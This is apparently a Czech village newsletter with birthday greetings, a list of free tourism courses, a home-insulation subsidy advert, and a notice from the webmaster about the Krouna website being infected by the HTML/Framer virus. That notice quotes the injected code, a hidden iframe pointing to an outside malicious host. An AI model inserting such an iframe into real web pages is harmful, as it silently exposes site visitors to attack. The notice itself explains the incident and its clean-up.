65 let – Bukáček Zdeněk 

70 let – Drahošová Marie 

75 let – Šplíchal Václav 

 – Urbanová Věra 

85 let – Kučerová Jarmila 

 – Cachová Vlasta 
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Nabídka kurzů Vzdělávacího centra Křižánky 
 

Vzdělávací centrum Křiţánky nabízí kurzy s těmito tématy: 

- Jazyková výuka – angličtina v cestovním 
ruchu – začátečníci, mírně pokročilí, pokročilí 

- Ekonomika cestovního ruchu 

- Geografie cestovního ruchu 
- Historie pro cestovní ruch 

- Techniky a sluţby cestovního ruchu 

- Příprava projektů v ČR 
- Jednodenní školení na téma: Vyuţití cestovního ruchu v regionu 

- Psychologie, metodika práce pracovníka v cestovním ruchu 

- Praktická příprava v cestovním ruchu 

- Informační technologie v cestovním ruchu 
- Jak začít s vyuţitím své nemovitosti v cestovním ruchu, jak rozšířit 

stávající nabídku 

 
Účast na kurzech je zdarma. 

 

Je možná účast i na jednotlivých kurzech, vždy je však nutné absolvovat 

všechny lekce přihlášeného kurzu. 

 

Změna termínu vyhrazena. (Termíny kurzů jsou uvedeny na webu.) 
Účastníci se mohou přihlásit nebo informovat: 

 na webu: www.obeckrizanky.cz/centrum 

 na telefonu 602 807 444 

 na e-mailu centrum@obeckrizanky.cz 
 osobně ve VC 

 
 

Informace pro návštěvníky obecních stránek www.krouna.cz 
 

V polovině měsíce září byly stránky napadeny virem HTML/Framer. V 

současné době uţ jsou stránky odvirovány a lépe zabezpečeny. 
Tento vir vkládal iframe do html kódu, ale také vkládal iframe pomocí 

scriptu. Napadl jak index*, tak i soubory s názvy začínající na main.... 

Zápis viru byl poměrně jednoduchý a vypadal takto: 
<iframe src="http://filmoflife.cn:8080/index.php" width=119 height=166 

style="visibility: hidden"></iframe> 

V době zavirování stránek zařadil Firefox obecní stránky na "černou 

listinu" a hlásil informaci "Podezřelá útočná stránka". V současné době je jiţ 
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tento problém vyřešen a uţivatelé tohoto prohlíţeče by neměli mít komplikace 
se zobrazením našich stránek. 

Od června 2009 má Krouna nové internetové stránky. Je tedy nutné napsat 

kompletně adresu www.krouna.cz do adresního řádku nikoli do vyhledávače, 
protoţe stránky jsou přesměrovány na novou adresu www.stranky.krouna.cz. 

Na serveru jsou pod starou adresou umístěny „staré“ stránky obce. 

 

Michal Kušta, administrátor obecního webu 
 

 
 

Dobře zabalený dům 
 

Získejte s námi až 100% dotace 
 
 

Program zelená úsporám je členěn do tří základních oblastí podpory: 

A. Úspora energie na vytápění 

B. Podpora novostaveb v pasivním energetickém standardu 

C. Vyuţití obnovitelných zdrojů energie pro vytápění a přípravu teplé vody 
D. Dotační bonus za vybrané kombinace opatření 

 

Ţádat o dotaci mohou vlastníci rodinných i bytových domů. 

 

V případě vašeho zájmu vám hned spočítáme, kolik peněz můžete získat. 

 

Kateřina Holubová, 
tel.: 605 858 888, e-mail: holubova@rpa.cz, www: dobrezabalenydum.cz 
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